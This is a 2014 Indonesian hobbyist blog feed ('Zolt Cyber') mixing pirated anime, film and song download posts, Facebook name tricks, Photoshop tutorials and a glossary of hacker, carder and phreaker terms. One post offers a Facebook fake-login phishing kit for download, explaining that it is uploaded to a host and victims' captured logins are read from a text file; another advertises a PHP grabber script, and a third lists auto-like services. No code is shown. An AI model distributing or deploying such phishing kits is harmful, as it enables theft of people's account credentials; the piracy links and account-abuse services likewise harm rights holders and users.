Download Naruto Shippuden Episode 396 Subtitle Indonesia

Thursday, 22 January 2015


Download Naruto Shippuden Episode 395 Subtitle Indonesia

Saturday, 17 January 2015



3GP | UP / SF / TF / SB
MP4 | UP / SF / TF / SB
AVI | UP / SF / TF / SB

Download Naruto Shippuden Episode 394 Subtitle Indonesia


3GP | UP / SF / TF / SB
MP4 | UP / SF / TF / SB
AVI | UP / SF / TF / SB

Download Naruto Shippuden Episode 393 Subtitle Indonesia

Saturday, 27 December 2014



Download : MP4 | 3GP | MKV
Languange : Indonesia

Cara Membuat Nama Akun Facebook Unik 2014 - 2015 [ NEW ]

Sunday, 7 December 2014



Assalamu'alaikum sobat sobat zolt cyber dimanapun kalian berada , dalam kali ini admin zolt cyber akan membahas tentang Cara Membuat Nama Akun Facebook Unik 2014 - 2015 [ NEW ] , wah itu kan udah dibahas di blog ini ya Cara Membuat Nama Unik :D tapi ini berbeda lho teman teman , cara ini agar akun facebook kalian bisa di ganti dengan font yang tidak valid menjadi valid , coba dilihat screenshot punya saya :D dan ini link profilnya https://m.facebook.com/100008585263047



Unik kan namanya wehehee . yok sekarang ke tutorialnya

Cara Membuat Nama Akun Facebook Unik 2014 - 2015 [ NEW ]

1. Buka Disini terlebih dahulu , pastikan keadaan facebook kamu udah di log out ( keluar )
2. Rancang font dulu untuk menjadi nama yang unik depan dan belakang wajib diisi font ini

, dan ini daftar fontnya

⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ╭ ╮ ╯ ╰ ╱ ╲ ╳ ▀ ▁ ▂ ▃ ▄ ▅ ▆ ▇ █ ▉ ▊ ▋ ▌ ▍ ▎ ▏ ▐ ░ ▒ ▓ ▔ ▕ ■ □ ▪ ▫ ▬ ▲ △ ► ▼ ▽ ◄ ◅ ◆ ◇ ◊ ○ ◌ ◎ ●◘ ◙ ◢ ◣ ◤ ◥ ◦☀ ★ ☆ ☉ ☺ ☻ ☼ ♀♁ ♂♠ ♣ ♦ ♪ ♫ ✽╱╲      ╱╳╳╲     ┋⿲ ⿲┋    ◢◈◈◈◈◣﹊  ||⿳圁圁⿳||? ╬╬╬╬╬░░╬╬╬ ╬╬﹋ ﹌ ﹋﹌﹋﹌﹋ ﹌﹋﹌ (╥﹏╥) (╥﹏╥) ͼ( )ͽ ͼ( )ͽ ┌П┐(◣_◢)┌П┐ ╭∩╮(︶.︶メ)╭∩╮⎝ᄽ⏝ᄿ⎠ ︻╦̵̵͇̿╤───✫✫╭∩╮︻╦̵̵͇̿̿̿̿╤──────◘〤 =₪۩۞۩₪=卝卝 ♚ 卝 メ ( ◣_◢)  ︻╦̵̵͇̿̿̿̿╤─────✫  ►►► ♥♥  ♚2014⇦  メ メ ︻╦̵̵͇̿̿̿̿╤───メ ★ ☆★ ★█ ██╬ ╬╬╬╬  ███╬╬╬╬╬╣ ★☆ ★☆★ メ︻╦̵̵͇̿̿̿̿╤───  メ ぐヺヺヺーく ー卝冖 ╭∩╮⎝⎲⎵⎲⎠╭∩╮  ︻╦̵̵͇̿̿̿̿╤───◘ ⎝◣⏝〤 ⎠╭∩╮╭∩╮ 冖卝ー ぐヺヺ ヺーく  メ ︻╦̵̵͇̿̿̿̿╤───◘  ─────╤╦̵̵͇︻ ) ┌∩┐[◣_◢]┌∩┐ ⑦⑧⑨  ➁➫➀➁➫➀➈➈➀☆ ♚ ™   ︻╦̵̵͇̿̿̿̿╤──────◘ {♥‿♥}★☆★—卝 ⇨★①②③④⑤⑥⑦⑧⑨☆♚⇦卝—卝 ⇨★①②③④⑤⑥⑦⑧⑨☆♚⇦卝—♥♡♥ ♥♡♥ メ ───╦̵̵͇̿̿̿̿╤︻ Ⅱ Ⅲ Ⅳ ⅤⅥ Ⅶ Ⅷ Ⅸ Ⅹ Ⅺ Ⅻⅰ ⅱ ⅲ ⅳ ⅴ ⅵ ⅶ ⅷⅸ ⅹ∂ ∆∈∏ ∑ − ∕ ∘ ∙ √ ∝ ∞ ∟ ∠∣∥∧ ∨ ∩ ∪ ∫∮∴ ∵ ∶ ∷∼ ∽≈≌≒≠ ≡≤ ≥ ≦ ≧≮ ≯⊕⊙⊥ ⊿ ⋲ ⌂ ⌐ ⌒ ⌠ ⌡① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇

3. kalau udah selesai tinggal buat akun


4. kalau sudah klik MENDAFTAR 
5. kemudian cek email untuk konfirmasi . Jadi Deh


Cukup sekian dulu ya sobat sobat zolt cyber , Wassalamu'alaikum !!! 

Mau Buat Nama Facebook Yang Keren / Nama Facebook Bergaris Bawah , Atas , Miring , Atau Tengah ?? KLIK DISINI Cara Menambahkan Pengikut / Followers Facebook Dengan Cepat KLIK DISINI
Tags : Cara Membuat Nama Unik Di Facebook , Cara Membuat Nama Facebook Bergaris Atas Dan Bawah , Cara Membuat Nama Facebook Bergaris Atas , Cara Membuat Nama Facebook Bergaris , Cara Membuat Nama Facebook Bergaris Tengah , Cara Membuat Nama Facebook Dengan Berbeda Huruf 
cara membuat akun sniper 2014 , cara membuat akun wajah 2015 , cara membuat akun unik 2015 , cara agar font yang tidak valid bisa dipakai di facebook , tutorial akun unik , cara membuat akun fuck

Script Fake Login Facebook V 3.0

Tuesday, 11 November 2014

Assalamualaikum Wr Wb Sobat Zolt Cyber !!!

Udah gk pernah post di blog hehe
kali ini admin akan share script fake login dari zolt cyber !!
Script ini fake login facebook , cukup upload di hosting kalian kok ,
terus extract , kalau mau lihat korban cukup http://www.domainmu.com/zolt.txt

download langsung aja ya

maaf demonya tidak ada , ada kesibukan di dunia nyata jadi ga bisa lama lama hehe

Download Disini

Wassalamualaikum Wr Wb

Download Film Annabelle Subtitle Indonesia [ 2014 ]

Saturday, 1 November 2014

 
 

[ Sinopsis ]
Annabelle (2014)

Director: John R. Leonetti

Writers: Gary Dauberman

Stars: Ward Horton, Annabelle Wallis, Alfre Woodard

 

Sinopsis Mengenai Film Annabelle 2014
Film horor barat berjudul “Annabelle” ini bercerita tentang sebuah boneka pada tahun 1970-an di Rhode Island-set Conjuring, yang dibintangi oleh Vera Farmiga, Patrick Wilson.
Film ini merupakan kisah dari spin-off 'The Conjuring' yang akan mengisahkan tentang boneka "Annabelle". Mia seorang wanita yang sedang menantikan kelahirannya mendapatkan sebuah hadiah dari sang suami John. Mia pun sangat senang akan hadiah yang diberikan oleh sang suami. Suatu malam tiba-tiba terjadi sebuah keanehan di dalam ruangan. Sesudah kelahiran dari Mia, mereka pindah ke rumah baru dan tanpa disadari juga boneka Annabelle yang mereka yakini tidak mereka bawa tiba-tiba saja kembali muncul. Lalu mulai dari sinilah teror ancaman menimpa keluarga Mia dan John.
Jadwal Tayang :
- Movie Tayang: Oktober-November 2014
- Movie Theaters: 3 October 2014
- Genre: Horror Thriller
- Companies: Warner Bros. Pictures
- Official from: deadline.com
- Official site: Annabellemovie.com
- Runtime: minutes
- MPAA Rating: R
Dan Ini Trailernya

 


Release : 3 October 2014
Genre : Horror
Stars : 5 Stars
Quality : 720p HC Web-DL
Size : 850 MB
Subtitle : Indonesia , Mandarin , Inggris
 Download Film Annabelle [ 2014 ]

Download Lagu Nur Bayan & Eny Sagita Horeligi 2014 - Doremi (Dadu Karo Remi)

Saturday, 20 September 2014



Doremi (Dadu Karo Remi) - Nur Bayan & Eny Sagita - Horeligi 2014

Penyanyi : Nur Bayan & Eny Sagita
Judul : Doremi (Dadu Karo Remi) - Nur Bayan & Eny Sagita - Horeligi 2014
Tahun : 2014
Album : Horeligi 2014

 
Download Doremi (Dadu Karo Remi) - Nur Bayan & Eny Sagita - Horeligi 2014.mp3 Gratis, semua file yang ada di
pokoke joget berbentuk format, MP3, VIDEO / Artikel teks dll, kami peroleh dari sumber pencarian di Google.co.id dan kami tidak menyimpan file berbentuk apapun didatabase kami.

Kumpulan Auto Like Facebook Yang Masih Work 2014 - 2015

Wednesday, 27 August 2014

http://2.bp.blogspot.com/-JnLjb-j2Omw/UTFqIj1oduI/AAAAAAAAB9A/qi8sLhZvaQA/s1600/fb-autolike.jpg 
 
 
Assalamua'alaikum wr. wb sobat zolt cyber !!
Kang Rifiyan kembali lagi neh di dunia maya wehehehe udah lama gak ngeblog :D banyak kesibukan didunia nyata , kali ini admin akan memberikan auto like facebook yang masih hidup :D

pasti pada udah tau kan  apa itu auto like wehehehe , yaudah langsung aja ya sob ,

1. DJ Liker 
 
2. Mesin Like
 
3. Hublaa
 
4. Mg Liker 
 
5. Moeliker 
 
6. Ofiicial Likerr
Diatas itu web kumpulan autolike yang work , udah segini aja ya sob , semoga bermanfaat sobb

jika ada yang mau ditanyakan , Pm aja facebook saya disini [ Rifiyan Lisandi ]
wasslamua'alaikum wr. wb .
  Keywords : Autolike terbaru 2014 , autolike facebook  yang masih work , autolike 2015, cara memakai autolike

Free Download Script PHP Grabber 2014

Thursday, 7 August 2014

Cara Membuat Facebook Card

Assalamu'alaikum Sobat Zolt Cyber . Lama Nih Gak Pernah post di blog Hehe :D

kali ini saya akan membahas tentang Cara Membuat Facebook Card , tentu udah pada tau ya ,

Facebook Card Gampang Banget Mbuatnya Lohhh :)

1. Download Filenya Di Mediafire Atau Di Tusfiles

2. Buka di Photoshop

3. Kalau udah tinggal Edit" aja di Layernya , Tekan F7 Kalau mau lihat layer

4. Hargai usaha kami ya kawan

5. Password ZIP zolt-cyber.blogspot.com

Udah kan , gampang kan !!

Selamat Mencoba , Semoga Berhasil !!

maaf gak bisa Screen Shot , Soalnya lagi banyak kerjaan hehee

Wassalamu'alaikum Wr. Wb.

Pengertian Phreaker , Hacker , Cracker , Defacer , Dll

Sunday, 3 August 2014


Selamat siang semua, hehe.. sekarang saya mau posting tentang apa yg dimaksud dengan hacker, phreaker, cracker, scammer, defacer, script kiddies, hacker wannabe, dan newbie.. hihi ^^
oke langsung saja.. cekidot !

Hacker 

adalah Hacker merupakan golongan profesional komputer atau IT, mereka boleh terdiri daripada jurutera komputer, pengaturcara dan sebagainya yang memiliki pengetahuan tinggi dalam sesuatu sistem komputer. Hacker mempunyai minat serta pengetahuan yang mendalam dalam dunia IT sehingga berkeupayaan untuk mengenal pasti kelemahan sesutu sistem dengan melakukan uji cuba terhadap sesuatu sistem itu. Namun, para hacker tidak akan melakukan sebarang kero\usakkan terhadap sesuatu sistem itu dan ia adalah merupakan etika seorang hacker.


Cracker,

cracker bisa di kategorikan sebagai orang yang memahami jenis pemrograman tingkat tinggi dan sedikit pengetahuan jaringan. UMUM-nya kracker kebanyakan membuat kemampuan untuk membuah sebuah program untuk meng-disfungsikan/
me-manipulasi jalur yang seharusnya. Contohnya: kracker membuat sebuah program agar program yang seharusnya berbayar menjadi gratis. kracker tidak terlalu memahami seluk beluk jaringan mereka kebanyakan umum-nya cenderung menyukai segala sesuatu yang bersifat GRATISAN.
Defacer,


Pernah ada suatu kasus saya melihat orang dengan bangganya memamerkan nama panggilannya didalam sebuah website milik orang lain. Lalu berkata “Website itu sudah aku hack” HACK? SUMPE LO? defacer kebanyakan umum-nya adalah orang iseng yang sedang ingin mencoba mencari tau baik dari segi ilmu, kemampuan, dan jati diri… kebiasaan yang paling mudah diketahui adalah mereka gemar merubah tampilan website menggunakan/memanfaatkan kelemahan bug/kecacatan dalam sebuah program. Defacer umumnya tidak begitu memahami tentang level pemrograman mereka lebih cenderung memahami tentang kinerja sebuah webserver beserta script yang ada didalamnya.



Phreaker,


Mungkin jarang di Indonesia yang pernah mendengar kata ini. Phreaker ini sebenarnya hampir sama sifatnya dengan kracker dimana sama-sama menyukai GRATISAN. Bedanya Phreaker lebih fokus ke dalam bug jaringan/telekomunikasi. Contoh mudahnya orang bisa menelpon ato ngenet gratis padahal seharusnya berbayar, atau contoh lainnya seseorang menggunakan bug yang ada didalam sebuah perusahaan telekomunikasi (meskipun tidak diketahui bocornya informasi ini hasil sendiri atau diberi tahu orang dalam) itu adalah salah satu kegiatan phreaking dan orang yang melakukannya di sebut phreaker.

Hacker Wannabe, 

ini yang sangat banyak dan mudah di jumpai di Indonesia banyaaaaaaakkkkkkkkk sekaliiiii… terutama di forum-forum. Saya kurang paham arti harfiah hacker wannabe tapi sebenarnya ini lebih cenderung mengarah ke psikologi dimana umum-nya para hacker wannabe ini ingin melakukan sesuatu yang gila dan di luar kenormalan baik di dalam cakupan kemampuannya atau diluar kemampuannya dengan tujuan mendapatkan pengakuan “hebat” atau “mampu” dari orang di sekitarnya. Contoh paling mudah kalau kalian punya teman yang mengaku bisa/jago hacking facebook/friendster dia termasuk dalam kategori hacker wannabe ini…

Script kiddies



, Ini juga sangat mudah dan banyaaaaaaaaaaaaaaaaaaaaaaaaak
bisa di temukan di Indonesia. Kebanyakan script kiddies ini kebanyakan berbicara blablabla padahal sebenarnya dasar tentang apa yang dia lakukan dia tidak paham. Script kiddies bisa di masukkan dalam kategori advanced user dimana keahliannya adalah “menggunakan” bukan “menemukan” apalagi sampai tingkat “menciptakan” kebanyakan manusia bergaya script kiddies adalah para defacer yang suka merubah tampilan website dengan menggunakan tools/software/program yang bukan buatannya/hasil pemikirannya sendiri.

Scammer

Kalau ini sih dulu sempat booming di Indonesia sekitar tahun 2000-2005 kalau di Indonesia dulu di beri julukan frauder alias penipu dunia maya yang cenderung menyukai melakukan penipuan/manipulasi/
generalisasi kartu kredit untuk mendapatkan beberapa barang kesukaannya. Hampir sama jenisnya dengan kracker/phreaker namun sangat ceroboh dan bodoh. Umumnya scammer/frauder ini memahami tentang seluk beluk jaringan namun sangat buta tentang pemrograman dasar dan keamanan.

Newbie… kalau yang ini sih sudah tidak perlu di letakkan dalam posisi abu-abu. Group newbie ini memang benar-benar pemula alias orang yang mungkin benar-benar baru menggunakan komputer. Kebanyakan newbie bisa berkembang menjadi Hacker, kracker, Defacer, Phreaker, Hacker Wannabe, Script kiddies, sampai Scammer. Newbie ini seperti sebuah telur yang akan ditentukan oleh tingkat pengetahuannya untuk menangkap sebuah pelajaran atau keadaan lingkungannya. Newbie bisa berubah menjadi apa saja asal ada pendukungnya dan bagaimana cara dia menilai sesuatu berdasarkan pikirannya.

Carder



Ketika dunia web pertamakali memperkenalkan keindahannya, mulailah muncul beberapa aksi pengrusakan-pengrusakan kecil yang dilakukan oleh para script kiddies. Tujuan utama tak lainhanyalah demi mendapatkan pengakuan (dari kelompoknya sendiri maupun masyarakat). Seiring dengan maraknya organisasi-organisasi yang menerapkan apikasi bisnis berbasis web, tujuan itu mulai berubah. Bukan lagi pengakuan yang mereka incar, tetapi aksi-aksi itu mulai mengarah pada sesuatu yang selama ini populer di kalangan umat manusia hehehe.. apalagi kalo bukan dengan tujuan kekayaan ($uang$). Professional dalam bidang ini mampu menyusup dalam sistem korban tanpa terdeteksi, keudian mencari file database atau log-log transaksi untuk mendapatkan rincian nomor-nomor kartu kredit. Mereka inilah yang kemudian disebut sebagai CARDER, para perampok cyber.
Pada intinya, untuk melakukan penyalahgunaan kartu kredit, yang diperlukan hanyalah nomor kartu, nama pemilik, dan tangal kadaluwarsanya. Jadi, misi utama seorang carder adalah bagaimana mendapatkan nomor-nomor kartu kredit orang lain, kemudian melakuakn transaksi pembelian dengan nomor kartu kredit itu.

Di urut berdasarkan tingkat kemampuan dan berbahaya-nya reputasi berdasarkan kategori :

1. Hacker

2. Phreaker

3. Cracker

4. Scammer

5. Defacer

6. Script kiddies

7. Hacker wannabe

8. Newbie

kalo saya lebih menuju Phreaker
lalu kamu masuk kategori yang mana...??



Pengertian Carding, Hacking, Cracking, Defacing

CARDING

Carding adalah berbelanja menggunakan nomor dan identitas kartu kredit orang lain, yang diperoleh secara ilegal, biasanya dengan mencuri data di internet. Sebutan pelakunya adalah Carder. Sebutan lain untuk kejahatan jenis ini adalah cyberfroud alias penipuan di dunia maya. Menurut riset Clear Commerce Inc, perusahaan teknologi informasi yang berbasis di Texas – AS , Indonesia memiliki carder terbanyak kedua di dunia setelah Ukrania. Sebanyak 20 persen transaksi melalui internet dari Indonesia adalah hasil carding. Akibatnya, banyak situs belanja online yang memblokir IP atau internet protocol (alamat komputer internet) asal Indonesia. Kalau kita belanja online, formulir pembelian online shop

tidak mencantumkan nama negara Indonesia. Artinya konsumen Indonesia tidak diperbolehkan belanja di situs itu.

Menurut pengamatan ICT Watch, lembaga yang mengamati dunia internet di Indonesia, para carder kini beroperasi semakin jauh, dengan melakukan penipuan melalui ruang-ruang chatting di mIRC. Caranya para carder menawarkan barang-barang seolah-olah hasil carding-nya dengan harga murah di channel. Misalnya, laptop dijual seharga Rp 1.000.000. Setelah ada yang berminat, carder meminta pembeli mengirim uang ke rekeningnya. Uang didapat, tapi barang tak pernah dikirimkan.

HACKING

Hacking adalah kegiatan menerobos program komputer milik orang/pihak lain. Hacker adalah orang yang gemar ngoprek komputer, memiliki keahlian membuat dan membaca program tertentu, dan terobsesi mengamati keamanan (security)-nya. Hacker memiliki wajah ganda; ada yang budiman ada yang pencoleng.

Hacker Budiman memberi tahu kepada programer yang komputernya diterobos, akan adanya kelemahan-kelemahan pada program yang dibuat, sehingga bisa “bocor”, agar segera diperbaiki. Sedangkan, hacker pencoleng, menerobos program orang lain untuk merusak dan mencuri datanya.

CRACKING

Cracking adalah hacking untuk tujuan jahat. Sebutan untuk cracker adalah hacker bertopi hitam (black hat hacker). Berbeda dengan carder yang hanya mengintip kartu kredit, cracker mengintip simpanan para nasabah di berbagai bank atau pusat data sensitif lainnya untuk keuntungan diri sendiri. Meski sama-sama menerobos keamanan komputer orang lain, hacker lebih fokus pada prosesnya. Sedangkan cracker lebih fokus untuk menikmati hasilnya.

DEFACING

Defacing adalah kegiatan mengubah halaman situs/website pihak lain, seperti yang terjadi pada situs Menkominfo dan Partai Golkar, BI baru-baru ini dan situs KPU saat pemilu 2004 lalu. Tindakan deface ada yang semata-mata iseng, unjuk kebolehan, pamer kemampuan membuat program, tapi ada juga yang jahat, untuk mencuri data dan dijual kepada pihak lain.

PHREAKING

Phreaking adalah praktek hacking menggunakan telepon, atau mempergunakan media telepon atau peralatan telepon agar si pelaku bisa masuk ke sistem tersebut. Di negara kita phreaking ini belum begitu populer dilakukan.

Cara Mengetahui Foto / Gambar Hasil Editan Photoshop

Tuesday, 22 July 2014

Assalamu'alaikum Wr. Wb .

Zolt Cyber - Cara Mengetahui Foto Asli Atau Palsu Hasil Editan Photoshop . 
Seiring dengan perkembangan zaman, kemampuan manipulasi foto secara digital sudah umum digunakan untuk berbagai keperluan seperti edit pencahayaan, edit pewarnaan, edit background, menghaluskan atau untuk tujuan yang lebih jauh lagi untuk keperluan manipulasi. 

Bila anda mengikuti berita media tentunya pernah mendengar bagaimana para artis yang membantah foto-foto ‘privasi’ mereka yang disebar luaskan secara tidak disengaja diinternet dengan kemudian berargumen bahwa foto privasi yang beredar adalah manipulasi / palsu. 


Dan seperti yang kita ketahui berikutnya tokoh yang selalu menjadi ‘konsultan’ untuk membuktikan keaslian foto hasil manipulasi adalah Roy Suryo. Pertanyaan berikutnya, bagaimanakah para tokoh telematika tersebut melacak atau menganalisa foto tersebut adalah asli atau manipulasi? 

Hal ini memang tidak dapat dijawab secara pasti karena setiap penganalisa mempunyai teknik mereka sendiri yang berbeda-beda, namun pada tulisan ini akan dibahas setidaknya ada cara untuk mengenali foto tersebut merupakan foto hasil editan atau bukan. 


Dan Berikut Ini Caranya :

1. Buka Fotonya Yang Mau Diketahui Hasil Editan Atau Asli

2. Buka Notepad


3. Drag gambarnya , seperti ini


4. CTRFL + F Cari Kata Photoshop , Jika ketemu jadi fotonya / gambarnya hasil editan photoshop . :D


Semoga Bermanfaat

Wassalamu'alaikum Wr. Wb.

Cara Mengubah Foto menjadi Sketsa Pensil di Adobe Photoshop

Saturday, 19 July 2014


Hello saya kembali posting lagi ^_^
Kali ini saya mau bagi bagi tutorial 

Cara Mengubah Foto menjadi Sketsa Pensil di Adobe Photoshop

Ini tutorial mudah banget loh, jadi cocok buat pemula :D
So, check it out! simak baik baik ya tutorialnya ;)


1. Siapkan Foto kertas buku catatan serta pensil penghapusnya 
    (agar terlihat lebih real) 
    Contohnya seperti ini :


    Jangan lupa mengatur Brightness - Contrastnya agar foto kertas terlihat cerah.

2. Buka Foto yang akan di edit dan crop menggunakan Rectangular Marquee tool, 
    tempatkan diatas layer kertas dan atur ukurannya.
    




3. Atur Brightness - Contrast foto menjadi agak gelap (jangan terlalu gelap)
4. Masih di layer foto, Duplikat foto dengan menekan Ctrl + J
5. Desaturate foto dengan klik Image > Adjustment > Desaturate. 
    atau dengan menekan Ctrl + Shift + U.




6. Duplikat layer lagi (Ctrl + J)
7. Ubah foto menjadi negatif, dengan klik Image > Adjustment > Invert.
    Atau dengan menekan Ctrl + I
 


8. Ubah Blending Mode menjadi Color Dodge di panel Layers. 
    (jangan panik jika gambar menjadi putih)
9. Untuk memunculkan kembali gambar tadi menjadi sketsa,
    Klik Filter > Other > Minimum dan atur besarnya.


10. Gabungkan semua layer foto tadi, dengan klik semua layer foto sambil menekan Ctrl, 
      lalu klik kanan di layernya dan Merge layers.


11. Ubah Blending Mode menjadi Multiply.
12. Rapihkan pinggiran bekas foto dengan Eraser Tool.


13. Dan ini dia hasil akhir tutorial ini. Selamat mencoba. :)
      Oiya jangan lupa komentar di blog jka berhasil ya :D


SUMBER : Elegy On Blogger
*Mohon cantumkan link sumber jika ingin copas. Terimakasih*

Tags : Cara Membuat , Tutorial , di Photoshop , Foto , Menjadi Sketsa Sketch , Pensil Pancil , Art , Mudah

 
Copyright © 2014 Zolt Cyber - All Rights Reserved
Template Created by Rifiyan Lisandi
powered by Blogger